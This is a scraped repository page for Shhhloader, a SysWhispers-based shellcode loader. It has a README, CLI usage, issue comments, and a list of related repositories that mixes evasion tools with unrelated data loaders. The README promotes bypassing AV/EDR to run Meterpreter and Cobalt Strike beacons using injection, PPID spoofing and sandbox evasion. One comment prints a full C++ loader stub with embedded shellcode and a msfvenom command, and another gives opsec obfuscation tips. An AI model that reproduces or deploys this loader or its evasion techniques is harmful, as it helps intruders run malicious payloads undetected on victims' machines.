SysWhispers Shellcode Loader

Shhhloader

Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub that has been integrated with SysWhispers in order to bypass AV/EDR. The included python builder will work on any Linux system that has Mingw-w64 installed.

The tool has been confirmed to successfully load Meterpreter and a Cobalt Strike beacon on fully updated systems with Windows Defender enabled. The project itself is still in a PoC/WIP state, as it currently doesn't work with all payloads.

2/9/22 EDIT: Shhhloader now includes 5 different ways to execute your shellcode! See below for updated usage. Big thanks to @Snovvcrash and their DInjector project for inspiration! I highly recommend taking a look at it for more information regarding the shellcode injection techniques and code that this tool is now based on.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ノ   
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-nr] [-v] [-d] [-o a.exe] file

ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -p explorer.exe, --process explorer.exe
                        Process to inject into (Default: explorer.exe)
  -m QueueUserAPC, --method QueueUserAPC
                        Method for shellcode execution (Options: ProcessHollow, QueueUserAPC,
                        RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
  -nr, --no-randomize   Disable syscall name randomization
  -v, --verbose         Enable debugging messages upon execution
  -d, --dll-sandbox     Use DLL based sandbox checks instead of the standard ones
  -o a.exe, --outfile a.exe
                        Name of compiled file

Video Demo: https://www.youtube.com/watch?v=-KLGV_aGYbw

Features:

  • 5 Different Shellcode Execution Methods (ProcessHollow, QueueUserAPC, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
  • PPID Spoofing
  • Block 3rd Party DLLs
  • Syscall Name Randomization
  • XOR Encryption with Dynamic Key Generation
  • Sandbox Evasion via Loaded DLL Enumeration
  • Sandbox Evasion via Checking Processors, Memory, and Time

Tested and Confirmed Working on:

  • Windows 10 21H1 (10.0.19043)
  • Windows 10 20H2 (10.0.19042)
  • Windows Server 2019 (10.0.17763)

Scan Results as of 2/9/22 (x64 Meterpreter QueueUserAPC): https://antiscan.me/scan/new/result?id=tntuLnCkTCwz

Scan

Greetz & Credit:

Owner
icyguider
It's sipple out there!
icyguider
Comments
  • Error FAILED to allocate memory in the current process, exiting: c000000d

    Error FAILED to allocate memory in the current process, exiting: c000000d

    Hey. For me only ProcessHollow works as shellcode execution method.

    For all the other methods I receive an error while running the generated exe.

    Generating:

    python Shhhloader.py  -p notepad.exe    Payload.raw   -v
    
    ┳┻|
    ┻┳|
    ┳┻|
    ┻┳|
    ┳┻| _
    ┻┳| •.•)  - Shhhhh, AV might hear us!
    ┳┻|⊂ノ
    ┻┳|
    [+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
    [+] Using notepad.exe for QueueUserAPC injection
    [+] Randomizing syscall names
    [+] Verbose messages enabled
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [!] a.exe has been compiled successfully!
    

    Running:

    Please wait 60 seconds...
    Sandbox checks passed
    hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d
    

    :-(

    Injecting in explorer.exe or notepad.exe doesn't make a difference.

    Edit:

    I traced it down to syscall to NtAllocateVirtualMemory. The return value is:

    RAX 00000000C000000D STATUS_INVALID_PARAMETER

    Please help!

  • CurrentThread

    CurrentThread

    hi

    so i managed to only get a cobalt beacon back when using CurrentThread method. i am not sure why the other methods are not working. if you can explain the steps to help. you debug it i will be happy to assist.

    OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.18363 N/A Build 18363

  • msfvenom alternatives [question]

    msfvenom alternatives [question]

    Hi @icyguider ! hope you are doing well. I am re-creating a tool like msfvenom using python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestion for me on open-source stuff which would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active any more. Cheers!

  • Recommendations

    Recommendations

    Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

    Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

  • win7 sp1 or windows server 2008 Test failed can you help me?

    win7 sp1 or windows server 2008 Test failed can you help me?

    • os: Windows 7 sp 1
    //generate payload
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
    //source code
    
    #define _WIN32_WINNT 0x0600
    #include <iostream>
    #include <windows.h>
    #include <psapi.h>
    #include <winternl.h>
    #include <tlhelp32.h>
    #include "Syscalls2.h"
    #ifndef UNICODE  
    typedef std::string String;
    #else
    typedef std::wstring String;
    #endif
    
    
    unsigned char shellcode[276] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
    0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
    0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
    0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
    0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
    0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
    0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
    0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
    0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
    0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
    0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
    0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
    0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
    0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
    0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
    0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
    0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
    0x65,0x78,0x65,0x00,
    };
    
    int main()
    {
        
        HANDLE hProc = GetCurrentProcess();
        DWORD oldprotect = 0;
        PVOID base_addr = NULL;
        HANDLE thandle = NULL;
        SIZE_T bytesWritten;
        size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
        NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (res != 0){
            std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
            return 0;
        }
        else {
            std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
        }
        res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
        if (res != 0){
            std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);
    
        if (res != 0){
            std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);
    
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtResumeThread(thandle, 0);
        if (res != 0){
            std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
        }
        res = NtWaitForSingleObject(thandle, -1, NULL);   
    }
    //build
    x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe
    

    The test is successful in win7 and above

    The output of win7 or windows 2008 is as follows

    NtAllocateVirtualMemory allocated memory in the current process sucessfully.
    NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtCreateThreadEx created thread in current process successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtResumeThread FAILED to resume created thread: c0000022
    
This is the official source code for SLATE. We provide the code for the model, the training code, and a dataset loader for the 3D Shapes dataset. This code is implemented in Pytorch.

SLATE This is the official source code for SLATE. We provide the code for the model, the training code and a dataset loader for the 3D Shapes dataset.

Apr 26, 2022
A Pytorch loader for MVTecAD dataset.

MVTecAD A Pytorch loader for MVTecAD dataset. It strictly follows the code style of common Pytorch datasets, such as torchvision.datasets.CIFAR10. The

Dec 27, 2021
Pytorch ImageNet1k Loader with Bounding Boxes.
Pytorch ImageNet1k Loader with Bounding Boxes.

ImageNet 1K Bounding Boxes For some experiments, you might wanna pass only the background of imagenet images vs passing only the foreground. Here, I'v

Feb 10, 2022
SysWhispers Shellcode Loader
SysWhispers Shellcode Loader

Shhhloader Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub

May 23, 2022
Shellcode antivirus evasion framework

Schrodinger's Cat Schrodinger'sCat is a Shellcode antivirus evasion framework Technical principle Please visit my blog https://idiotc4t.com/ How to us

Mar 23, 2022
HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures.

HatVenom HatSploit native powerful payload generation and shellcode injection tool that provides support for common platforms and architectures. Featu

May 17, 2022
Basic python tools to generate shellcode runner in vba

vba_bin_runner Basic python tools to generate shellcode runner in vba. The stub use ZwAllocateVirtualMemory to allocate memory, RtlMoveMemory to write

Aug 24, 2021
Shellcode runner to execute malicious payload and bypass AV
Shellcode runner to execute malicious payload and bypass AV

buffshark-shellcode-runner Python Shellcode Runner to execute malicious payload and bypass AV This script utilizes mmap(for linux) and win api wrapper

Apr 8, 2022
C++ fully undetected shellcode launcher
C++ fully undetected shellcode launcher

charlotte c++ fully undetected shellcode launcher ;) releasing this to celebrate the birth of my newborn description 13/05/2021: c++ shellcode launche

May 12, 2022
Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20)

x64-shellcode-encoder Custom 64 bit shellcode encoder that evades detection and removes some common badchars (\x00\x0a\x0d\x20) Usage Using a generato

Jan 26, 2022
pip-run - dynamic dependency loader for Python

pip-run provides on-demand temporary package installation for a single interpreter run. It replaces this series of commands (or their Windows equivale

May 2, 2022
Basic loader is a small tool that will help you generating Cloudflare cookies

Basic Loader Cloudflare cookies loader This tool may help some people getting valide cloudflare cookies Installation ?? : pip install -r requirements.

Mar 30, 2022
IDA file loader for UF2, created for the DEFCON 29 hardware badge

UF2 Loader for IDA The DEFCON 29 badge uses the UF2 bootloader, which conveniently allows you to dump and flash the firmware over USB as a mass storag

Feb 8, 2022
IDA loader for Apple's iBoot, SecureROM and AVPBooter
IDA loader for Apple's iBoot, SecureROM and AVPBooter

IDA iBoot Loader IDA loader for Apple's iBoot, SecureROM and AVPBooter Installation Copy iboot-loader.py to the loaders folder in IDA directory. Credi

Mar 16, 2022
Used Insta Loader to download high quality images from instagram account
Used Insta Loader to download high quality images from instagram account

Insta Dp Downloader Project Description: In this project, I have used "Insta Loader" to download high quality images from instagram account. You only

Oct 24, 2021
This is the official source code for SLATE. We provide the code for the model, the training code, and a dataset loader for the 3D Shapes dataset. This code is implemented in Pytorch.

SLATE This is the official source code for SLATE. We provide the code for the model, the training code and a dataset loader for the 3D Shapes dataset.

Apr 26, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

Nov 11, 2021
Single machine, multiple cards training; mix-precision training; DALI data loader.

Template Script Category Description Category script comparison script train.py, loader.py for single-machine-multiple-cards training train_DP.py, tra

Dec 6, 2021
A Pytorch loader for MVTecAD dataset.

MVTecAD A Pytorch loader for MVTecAD dataset. It strictly follows the code style of common Pytorch datasets, such as torchvision.datasets.CIFAR10. The

Dec 27, 2021
Python data loader for Solar Orbiter's (SolO) Energetic Particle Detector (EPD).
Python data loader for Solar Orbiter's (SolO) Energetic Particle Detector (EPD).

Data loader (and downloader) for Solar Orbiter/EPD energetic charged particle sensors EPT, HET, and STEP. Supports level 2 and low latency data provided by ESA's Solar Orbiter Archive.

May 18, 2022